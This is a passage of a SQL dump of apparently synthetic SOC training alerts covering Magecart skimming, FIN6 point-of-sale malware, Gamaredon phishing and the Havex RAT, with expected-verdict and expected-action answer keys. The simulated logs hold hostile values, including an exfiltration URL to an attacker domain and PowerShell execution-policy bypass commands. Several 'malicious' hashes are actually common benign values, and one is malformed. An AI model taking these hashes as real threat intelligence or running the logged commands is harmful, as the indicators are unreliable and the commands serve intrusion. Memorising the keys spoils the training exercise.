Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(455, 'Initial Compromise via Third-Party Library', 'high', 'Web Application Firewall (WAF) Logs', 'An intrusion was detected via a compromised third-party advertising library. The library, affected by Magecart, injects malicious JavaScript into checkout pages to exfiltrate sensitive information.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"http_request\":\"GET /ad-library.js HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"referrer\":\"https://example-store.com/checkout\",\"malicious_script_hash\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"filename\":\"ad-library.js\",\"detected_by\":\"WAF\",\"alert_id\":\"waf-alert-20231015-0001\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Magecart attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magecart-injected scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ad-library.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Filename is part of third-party library.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(456, 'Execution of Obfuscated JavaScript', 'high', 'JavaScript Console Logs', 'Obfuscated JavaScript code executed on the checkout page to skim credit card details and transmit them to an attacker-controlled server.', 'Code Injection', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:54Z\",\"event_id\":\"js_exec_001\",\"script_url\":\"http://malicious-domain.com/skimmer.js\",\"executed_by_ip\":\"192.168.1.101\",\"exfiltration_url\":\"http://attacker-site.com/cc_capture\",\"attacker_ip\":\"203.0.113.45\",\"script_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"filename\":\"skimmer.js\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/skimmer.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known credit card skimming attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with obfuscated JavaScript malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(457, 'Data Exfiltration to Drop Server', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected an unauthorized data transfer from the compromised internal server to an external drop server associated with Magecart. The data transferred includes payment information extracted from the internal server. The traffic was observed from internal IP 192.168.10.15 to external IP 203.0.113.45, with the data being exported in a compressed file named \'payments_exfil.zip\'. The hash of the exfiltrated file is 9e107d9d372bb6826bd81d3542a419d6.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"payments_exfil.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"user\":\"websrv_user\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP associated with Magecart drop servers.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payments_exfil.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used for exfiltrated payment data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated data files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(458, 'Suspicious Vendor Login Detected', 'high', 'SIEM Logs', 'An unauthorized login attempt was detected using compromised credentials from a trusted vendor. The attacker used these credentials to gain initial access to the retail giant\'s POS network.', 'Initial Access', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:20:30Z\",\"event_id\":\"4567\",\"event_type\":\"login_attempt\",\"username\":\"vendor_john_doe\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"login_status\":\"success\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"network_domain\":\"pos_network\",\"hash\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"file_name\":\"pos_access_script.exe\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"vendor_john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"The username is associated with a trusted vendor but was used from an unusual location.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"The IP address is linked to multiple unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash corresponds to a known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_access_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"The filename is consistent with scripts used in previous breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(459, 'Trinity Malware Deployment on POS Systems', 'high', 'Endpoint Detection and Response (EDR)', 'FIN6 has deployed Trinity malware on several Point-of-Sale (POS) systems, targeting RAM to scrape unencrypted credit card data.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:22:45Z\",\"event_id\":\"4624\",\"computer_name\":\"POS-Server-22\",\"user\":\"svc-posadmin\",\"source_ip\":\"185.23.45.67\",\"internal_ip\":\"192.168.1.105\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\pos_trinity.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_description\":\"Execution of suspicious binary linked to Trinity malware on POS system.\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\pos_trinity.exe\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known FIN6 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local POS system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Trinity malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_trinity.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename identified as Trinity malware targeting POS systems.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc-posadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Service account used in anomalous execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(460, 'Establishing Persistent Access', 'high', 'Network Traffic Analysis', 'The attacker has set up a persistent backdoor on the POS network, ensuring they can regain access even if initial malware installations are removed. Network traffic analysis revealed unauthorized communication from an internal host to a known malicious IP, indicating the presence of a backdoor.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"port\":\"4444\",\"action\":\"allowed\",\"user\":\"john_doe\",\"process_name\":\"backdoor_service.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_family\":\"APT_Backdoor\",\"event_id\":\"1002\",\"message\":\"Outbound connection to known malicious IP detected from internal host.\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to establish persistent access by creating unauthorized external connections.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(461, 'Unauthorized Lateral Movement Detected', 'high', 'Anomaly Detection Systems', 'An unauthorized lateral movement has been detected involving compromised credentials and malware. The attacker, identified as FIN6, is attempting to move laterally through the network, targeting point-of-sale (POS) systems and databases. The activity involves the use of specific malware and compromised user accounts.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:00Z\",\"src_ip\":\"195.22.26.189\",\"dest_ip\":\"192.168.1.15\",\"src_user\":\"j.doe\",\"compromised_credential\":true,\"malware_hash\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"malware_filename\":\"pos_grabber.exe\",\"activity\":{\"description\":\"Lateral movement attempt using compromised credentials\",\"target_system\":\"POS server\",\"method\":\"SMB protocol over port 445\"}}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.22.26.189\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with FIN6 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal POS server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Known hash of malware used by FIN6\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pos_grabber.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Executable associated with POS system attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(462, 'Exfiltration of Credit Card Data', 'high', 'Data Loss Prevention (DLP) Tools', 'FIN6 has initiated the exfiltration of previously scraped credit card data to an external server, marking the completion of their primary objective in this attack cycle.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:05Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.199.108.153\",\"destination_domain\":\"malicious-server.com\",\"protocol\":\"HTTPS\",\"file_name\":\"cc_data_dump.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"alert_trigger\":\"DLP: Credit Card Data Exfiltration Detected\",\"data_volume\":\"25MB\",\"process_name\":\"python.exe\",\"process_id\":4567}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration activities by FIN6.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious-server.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used by FIN6 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cc_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern for exfiltration data dumps.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known FIN6 malware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(463, 'Initial Access via Weaponized Word Document', 'high', 'Email Gateway Logs', 'A phishing email was detected containing a weaponized Word document. The email was designed to appear as an official military communication, enticing the recipient to open the attachment. Upon opening, the document initiates a template injection exploit aimed at gaining initial access to the target\'s network.', 'Phishing', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_id\":\"d5f7a8e3-9abc-4567-80d5-5d3fa8765b41\",\"source_ip\":\"91.121.92.36\",\"destination_ip\":\"192.168.1.45\",\"sender_email\":\"info@military-ops.co\",\"recipient_email\":\"j.doe@target-organization.com\",\"subject\":\"Urgent: Military Operations Briefing\",\"attachment\":{\"filename\":\"Operations_Update.docx\",\"hash\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\"},\"malware_family\":\"Gamaredon\",\"exploit_technique\":\"Template Injection\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"91.121.92.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Gamaredon operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"info@military-ops.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Email domain used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Gamaredon malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(464, 'Execution of Embedded VBScript Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the Word document, a concealed VBScript backdoor is executed, connecting to a command and control server, enabling remote command execution and persistence within the network.', 'Code Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"event_type\":\"code_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"winword.exe\",\"script_name\":\"malicious_script.vbs\",\"script_hash\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"c2_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"command\":\"cscript.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"action\":\"process_created\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript backdoor\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a malicious VBScript backdoor\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(465, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'The attackers have initiated data exfiltration by encrypting sensitive military data and transferring it through a secure TLS channel to an external server. The data was gathered using a deployed VBScript backdoor, enabling discreet exfiltration.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:53:21Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.77\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"protocol\":\"TLS\",\"username\":\"jdoe\",\"filename\":\"military_data_enc.zip\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"transferred\",\"encryption\":\"AES-256\",\"malware_name\":\"VBScript_Backdoor\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript_Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"military_data_enc.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encrypted file potentially containing sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"internal\",\"details\":\"User credentials potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(466, 'Initial Access: Trojanized Software Update Detected', 'high', 'Software Update Logs', 'A trojanized software update for the ICS system has been detected. This update was distributed by attackers to gain initial access into the network by compromising the supply chain of the legitimate software provider.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:10Z\",\"event_type\":\"software_update\",\"software_name\":\"ICS_Control_Update\",\"version\":\"v2.3.4\",\"update_status\":\"completed\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_user\":\"admin\",\"file_path\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"signature_status\":\"invalid\",\"detected_malware\":\"Trojan.IcsMalware\",\"internal_ip_range\":\"192.168.0.0/16\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known trojanized update.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file path for trojanized software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(467, 'Execution: \'Havex\' RAT Deployment', 'high', 'Endpoint Detection and Response (EDR)', 'Following the initial access, \'Havex\' RAT is executed to provide attackers with remote control over the compromised systems. The malware was identified running on a critical server, attempting to establish outbound connections to known malicious IPs.', 'Remote Access Trojan', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T15:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"alert_generated\":true}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers for Havex RAT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Havex RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"havex.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute Havex RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
